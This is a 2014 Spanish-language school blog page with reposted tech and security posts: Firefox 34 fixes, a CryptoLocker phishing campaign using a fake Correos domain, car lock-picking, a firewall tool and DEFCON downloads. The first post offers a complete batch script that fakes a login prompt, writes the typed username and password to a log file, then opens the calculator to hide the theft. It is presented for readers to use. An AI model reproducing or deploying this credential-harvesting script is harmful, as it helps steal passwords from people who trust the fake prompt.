Blog gratis
Reportar
Editar
¡Crea tu blog!
Celulares
¡Sorpréndeme!
¡Vota las mejores fotos chicas!
Blog de la Escuela de Educación Secundaria Técnica N 8 de Quilmes
Administrador Prof. Claudio Enrique Alonso Alvite
img
« Blog
Entradas del 03 de Diciembre, 2014
03 de Diciembre, 2014    General

Super-cutre script para hacerse un keylogger en batch

Algo cutre pero muy apañao... y seguro que más de uno se dará un gustazo con el batch... Xd
 

Se trata de un script para hacerse un keylogger *muy* básico. Simplemente crea el directorio c:Logs y luego lanza el fichero Logger.bat con el siguiente código:
@echo off
color a
title Login
cls
echo Introduce usuario y password para poder ejecutar el programa:
echo.
echo.
cd "C:Logs"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >> Log.txt
start calc.exe
exit
Enjoy!

Fuente: http://www.latesthackingnews.com/2014/04/09/how-to-create-a-keylogger-in-notepad/


Palabras claves , ,
publicado por alonsoclaudio a las 22:34 · Sin comentarios  ·  Recomendar
 
03 de Diciembre, 2014    General

Firewall interactivo con capacidades de aprendizaje.

Mason es una herramienta que construye interactivamente un cortafuegos utilizando ipfwadm o ipchains de Linux. Para configurar un cortafuegos con Mason solo hay que ejecutarlo en la máquina destinada a cortafuegos y habilitar todos los tipos de conexiones que se desee que el servidor de seguridad permita. Mason analiza el trafico de red y muestra una lista de reglas de firewall que permiten y bloquean esas conexiones.

Mason fue diseñado específicamente para facilitar la tarea de construir razonablemente un buen firewall de filtrado de paquetes para los sistemas que están bajo su control. Su función es la de convertir las entradas del registro que produce el núcleo Linux en comandos de ipfwadm o ipchains, para que el usuario los utilice configurar el ... Continuar leyendo
Palabras claves , , , , , ,
publicado por alonsoclaudio a las 22:33 · Sin comentarios  ·  Recomendar
 
03 de Diciembre, 2014    General

Mozilla publica Firefox 34 y corrige nueve nuevas vulnerabilidades

Mozilla ha anunciado la publicación de la versión 34 de Firefox, junto con ocho boletines de seguridad destinados a solucionar nueve vulnerabilidades en el propio navegador y el gestor de correo Thunderbird.

Entre las mejoras incluidas en Firefox 34 destaca la inclusión de videoconferencias con Firefox Hello desde el propio navegador, un nuevo cuadro de búsquedas, mayor personalización, acceso a WebIDE para desarrolladores y se ha desactivado SSLv3.

Por otra parte, se han publicado ocho boletines de seguridad (tres de ellos considerados críticos y tres de nivel alto y dos moderados) que corrigen nueve nuevas vulnerabilidades en los diferentes productos Mozilla. También se han publicado las versiones Firefox ESR 31.3 y Thunderbird 31.3 que solucionan estas vulnerabilidades... Continuar leyendo
Palabras claves , , , ,
publicado por alonsoclaudio a las 22:31 · Sin comentarios  ·  Recomendar
 
03 de Diciembre, 2014    General

Atención: Infecciones masivas de CryptoLocker con e-mails de un falso 'Correos'

A lo largo de la tarde no he parado de recibir peticiones de ayudas desde varias organizaciones y empresas debido a una masiva infección mediante 'CryptoLocker'.

La fisonomía del ataque se aleja de los típicos correos mal escritos y que son detectables a simple vista. Por contra, la campaña está empleando e-mails que simulan provenir de Correos y hablan sobre un paquete que no ha podido ser entregado.

El dominio que están empleando (al menos en algunos de esos e-mails) es correos24.net 

Como se puede ver en el whois:

 Domain Name: CORREOS24.NET
   Registrar: REGISTRAR OF DOMAIN NAMES REG.RU LLC
   Whois Server: whois.reg.ru
   Referral URL: http://www.reg... Continuar leyendo
Palabras claves , ,
publicado por alonsoclaudio a las 22:29 · Sin comentarios  ·  Recomendar
 
03 de Diciembre, 2014    General

¿Por qué no hay botón “no me gusta” en Facebook?


Tal vez te hayas preguntado alguna vez por qué no hay botón de “no me gusta” en Facebook. Parece algo tan simple, tan trivial, tan cotidiano, que resulta hasta exasperante que no exista.

De hecho, hasta fue caldo de cultivo del famoso virus “no me gusta”, que prometía instalarlo en tu PC. Existen actualmente algunos plugins para algunos navegadores que dotan del famoso botón sin instalarnos ningún virus, pero lo cierto es que no cumplen el objetivo que buscamos: informar que algo nos desagrada.

Hace un tiempo se creó un grupo en la red demandando la creación del botón en cuestión, que de hecho llegó a reunir más de 3 millones de fans en pocos días. Nunca quedó claro si fue luego del virus o luego del grupo, pero ambos seguramente tuvieron que ver, pero Zuckerberg salió a responder a la demanda y sostuvo que debería considerarlo seriamente para poder resolverlo... Continuar leyendo

Palabras claves ,
publicado por alonsoclaudio a las 21:30 · Sin comentarios  ·  Recomendar
 
03 de Diciembre, 2014    General

¿Se venció tu Word?¿Está pesado? Reemplazalo por uno libre, gratuito y liviano


Te traemos un procesador de textos libre, livianísimo, y que podés instalar en cualquier sistema operativo. Además: ¡pesa menos que una foto de alta definición!

A las usuarias del mundo GNU/linux las alternativas no nos parecen nada novedoso. En GNU/Linux tenemos miles de formas de hacer la misma cosa. Y si bien puede parecer innecesario es todo lo contrario pues tener más alternativas para hacer lo mismo, nos permite adecuar el software a las necesidades, ahorrando tiempo, o recursos del sistema o lo que fuere.


Si estás encerrada tras las ventanas de Micro$oft probablemente no sepas que además de la suite ofimática de esa empresa existen otras alternativas. Hace un tiempo te hablamos de Libre Office, una suite ofimática completa, gratuita y libre, compatible con la mayoría de los formatos existentes.

Pero hay que decir que muchas veces necesitás sólo un... Continuar leyendo

Palabras claves ,
publicado por alonsoclaudio a las 21:25 · Sin comentarios  ·  Recomendar
 
03 de Diciembre, 2014    General

Las nuevas técnicas para abrir coches sin llaves

En Ozarow Mazowiecki (Polonia) se celebra una feria especilizada en el desbloqueo de coches, una feria en la que exponen las últimas técnicas empleadas por los ladrones para robar coches. 
Fernando Romero se encuentra junto a la cerradura de un BMW Serie 7 actual. Este colombiano creció en Londres, y mantiene un próspero negocio de cerrajería en Edimburgo. ¿Sus clientes? "Por encima de todo, talleres", confirma Romero.

En el ojal de su polo y sobre el hombro lleva estampada una aguja dorada, símbolo de la unión de cerrajeros. Él es uno de los más respetados del ramo. Romero sonríe y desliza una delgada herramienta hacia el interior de la cerradura del BMW. El utensilio se asemeja a una tenazas. La primera mitad la presiona contra el cilindro; la segunda la utiliza para generar tensión. De esta manera tantea qué clavijas deben ser presionadas. "La tensión es la llave del éxito", hace saber a su público. "Si la clavija número siete está dura, ahí debo picar".... Continuar leyendo
Palabras claves , , ,
publicado por alonsoclaudio a las 21:24 · Sin comentarios  ·  Recomendar
 
03 de Diciembre, 2014    General

Presentaciones de DEFCON 22 para descarga

Desde la web de Defcon ya nos podemos descargar a través de un archivo Torrent todos los vídeos y presentaciones de la vigésimo segunda edición de Defcon celebrada este pasado verano.
El archivo Torrent contiene más de 20Gb, con lo que te puede llevar un buen rato. Si no lo quieres todo y sólo te interesan ciertas presentaciones, también las puedes descargar de forma individual desde este enlace.

Fuente: CyberHades
Palabras claves
publicado por alonsoclaudio a las 21:22 · Sin comentarios  ·  Recomendar
 
CALENDARIO
Ver mes anterior Abril 2024 Ver mes siguiente
DOLUMAMIJUVISA
123456
78910111213
14151617181920
21222324252627
282930
BUSCADOR
Blog   Web
TÓPICOS
» General (2606)
NUBE DE TAGS  [?]
SECCIONES
» Inicio
ENLACES
MÁS LEÍDOS
» Analizando el LiveBox 2.1 de Orange
» Cómo espiar WhatsApp
» Cómo usar Metashield protector for Client y por qué utilizarlo
» Detectando tráfico de conexiones HTTP inversas de Meterpreter (Snort)
» Ejecución remota de código arbitrario en OpenSSH
» Ganar dinero con 1.200 Millones de identidades robadas
» Hardware y sus 4 Funcionamientos Basicos y Principales en una Computadora
» Redes de la Deep Web: CJDNS y la Red Hyperboria
» Unidad Central de Procesamiento CPU
» Wassap, la aplicación que permite usar WhatsApp desde la PC
SE COMENTA...
» Cómo espiar WhatsApp
595 Comentarios: Scott, Scott, Jarlinson mercy, [...] ...
» Qué hacer ante el robo de un teléfono móvil o una tableta
2 Comentarios: best buy security cameras swann, best buy security cameras swann
» Espiando usuarios gracias a la vulnerabilidad en cámaras TRENDnet
1 Comentario: Coin
» Recopilatorio de aplicaciones y sistemas vulnerables para practicar
2 Comentarios: vera rodrigez ...
» SoftPerfect WiFi Guard permite saber quién esta conectado a mi WiFi
2 Comentarios: firdous ...
SOBRE MÍ
FOTO

Prof. Claudio Enrique Alonso Alvite



» Ver perfil

AL MARGEN
Escuela de Educacion Secundaria Tecnica N 8 de Quilmes
(Técnicos en Informática Personal y Profesional)
FULLServices Network | Blogger | Privacidad